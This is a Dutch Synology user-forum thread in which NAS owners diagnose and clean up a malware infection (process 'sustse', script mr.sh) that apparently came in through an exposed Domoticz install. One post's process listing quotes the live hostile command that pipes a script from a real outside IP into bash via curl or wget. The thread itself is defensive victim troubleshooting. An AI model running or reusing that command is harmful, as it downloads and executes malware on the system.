Auteur Topic: Process 'sustse' gebruikt volledige processor  (gelezen 1948 keer)

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #15 Gepost op: 14 juni 2019, 15:28:40 »
DSM kan niet zonder root.
Je kunt wel een sterk wachtwoord instellen voor admin (het ww van root is namelijk die va admin)
Je kunt ook een nieuwe gebruiker maken met admin rechten en die ook een ster ww geven.
Als dat is gedaan, dan kan je admin uitschakelen.
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 110
Re: Process 'sustse' gebruikt volledige processor
« Reactie #16 Gepost op: 14 juni 2019, 15:32:07 »
Hmm, verkeerde vraag, zie edit.

Heb inderdaad admin uitgeschakeld, eerste actie bij inrichten van DSM :-)
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #17 Gepost op: 14 juni 2019, 15:45:21 »
Beetje gegoogled maar, volgens mij kan Domoticz niet zonder root.
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #18 Gepost op: 14 juni 2019, 23:10:55 »
Sinds gisteren heb ik hier ook last van, geen idee hoe het erop is gekomen. Alleen heb ik geen idee hoe ik die bestanden kan zien of verwijderen, is het process te "killen" met de DSM programma's of heb je daar Linux kennis voor nodig?
Wat is het IP adres van 'oanacroner1? dan kan ik dat in ieder geval blokkeren in de firewall.
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Process 'sustse' gebruikt volledige processor
« Reactie #19 Gepost op: 14 juni 2019, 23:59:11 »
In elk geval is dit hetzelfde probleem als hier gemeld wordt.

In beide topics zit het commando om een executable file op te halen "107.174.47.156/mr.sh".

Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Process 'sustse' gebruikt volledige processor
« Reactie #20 Gepost op: 15 juni 2019, 00:13:59 »
Toch niet zo recent. Er worden blijkbaar meerdere Amerikaanse IP adressen gebruikt uit een blok van een kwart miljoen adressen.

Als ik op zo'n IP google vind ik b.v. al 4 meldingen van ca 2 maand geleden op een site waar misbruik gemeld wordt:



Hoewel er niet vanaf dat IP gehacked is. De hack (of zelf gestarte, besmette software) is eerder binnengekomen en haalt op dat adres een script op voor verdere infectie.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #21 Gepost op: 15 juni 2019, 10:32:02 »
Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.
De 2 Topics samen gevoegd.
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #22 Gepost op: 15 juni 2019, 10:59:45 »
Ook in bestand /etc/cron.d/apache trof ik soortgelijke regel aan.

Ik heb de bestanden in /etc/cron.d/ leeg gemaakt;
Ik heb het bestand in /etc/cron.hourly/ verwijderd;
Ik heb het bestand /var/tmp/wc.conf verwijderd;
Ik heb het bestand /var/tmp/sustse verwijderd;
Ik heb ip adres 107.174.47.156 in mijn firewall geblokkeerd;
Ik heb alle actieve processen die mr.sh bevatten gekilled (ps aux | grep mr.sh).

Ik draai inderdaad ook Domoticz en deze heb ik direct bijgewerkt naar de meest recente versies.

Ik zie momenteel geen processen meer gestart worden en ik zie geen bestanden meer terug komen.
Fingers crossed!

Dank voor alle reacties zo ver!
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #23 Gepost op: 15 juni 2019, 11:02:21 »
Correctie, er worden nog wel sessies gestart...

root     14912  0.0  0.1   9604  1204 ?        Ss   11:00   0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root     14914  0.0  0.0   9608   652 ?        S    11:00   0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root     14916  0.0  0.5  85936  5468 ?        S    11:00   0:00 curl -s http://107.174.47.156/mr.sh
root     17968  0.0  0.1  23132   964 pts/6    S+   11:01   0:00 grep --color=auto mr.sh

(maar al wel een stuk minder).
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #24 Gepost op: 15 juni 2019, 11:05:28 »
@mbomhof, ik hoop dat het gaat lukken, ik draai ook DomoticZ op de NAS. Als het gelukt is om deze troep te stoppen kan je me dan vertellen wat ik moet doen? Ik ben een Linux leek.
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline eaz

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 4
  • Berichten: 39
Re: Process 'sustse' gebruikt volledige processor
« Reactie #25 Gepost op: 15 juni 2019, 11:18:18 »
ook meldingen op domoticz forum:

https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329&sid=aa8def5554c1013476538ee56924114d

edit: sorry, ik zie net dat dit al gepost was, door de merge erbij gekomen:-)
  • Mijn Synology: DS415+
  • HDD's: 2xssd 480Gb, 2x 4TB
  • Extra's: 8GB

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Process 'sustse' gebruikt volledige processor
« Reactie #26 Gepost op: 15 juni 2019, 12:18:36 »
Bovenstaande link bevat een bevestiging dat de besmetting via een webpagina van domoticz verloopt die men via het internet toegankelijk gemaakt heeft.. CVE-2019-10664. Maar ook dat deze kwetsbaarheid in de nieuwste versies verholpen is.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 110
Re: Process 'sustse' gebruikt volledige processor
« Reactie #27 Gepost op: 15 juni 2019, 13:26:06 »
Met welk commando kan ik zien welke sessies worden opgestart? Wil graag nog even checken.

Complimenten overigens voor alle snelle reacties, mooi te zien hoe dit probleem aangepakt wordt door de community!  :)
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #28 Gepost op: 15 juni 2019, 13:40:36 »
Met dit commando krijg je een lijst met alle processen die 'mr.sh' bevatten:

ps aux | grep mr.sh
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Process 'sustse' gebruikt volledige processor
« Reactie #29 Gepost op: 15 juni 2019, 14:24:09 »
Hier nog een analyse van deze malware van september vorig jaar. (securityaffairs.co)

Geen oplossing voor het verwijderen, maar het geeft wel een idee wat mr.sh doet.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR


 

Schijf bijna vol....maar heb maar 40% gebruikt!

Gestart door weddjeBoard Cloud Station & Drive

Reacties: 6
Gelezen: 1606
Laatste bericht 03 mei 2017, 16:21:49
door Birdy
Cloud Station gebruikt voor overzetten maar veel meer data op het doel station

Gestart door nobassBoard NAS hardware vragen

Reacties: 12
Gelezen: 3219
Laatste bericht 22 juni 2015, 15:34:15
door Birdy
Photostation openen via DSM geeft "gebruikt een niet ondersteund protocol"

Gestart door SPiETBoard Photo Station / Blog

Reacties: 3
Gelezen: 728
Laatste bericht 13 december 2018, 13:48:26
door SPiET
Nas benaderen via internet, verschillende manieren, welke wordt meest gebruikt?

Gestart door JozefBoard DDNS / Quick Connect / EZ-Internet / Portforwarding

Reacties: 3
Gelezen: 27101
Laatste bericht 31 juli 2013, 13:30:07
door thecell
FTP connectie verbreekt wanneer passive port 55544 wordt gebruikt

Gestart door nico_van_wijkBoard FTP, NFS and Samba Server

Reacties: 2
Gelezen: 1251
Laatste bericht 10 januari 2014, 15:39:04
door Birdy
Synology-Forum.nl is een Nederlands gebruikersforum en staat volledig los van het merk Synology. Lees onze privacyverklaring.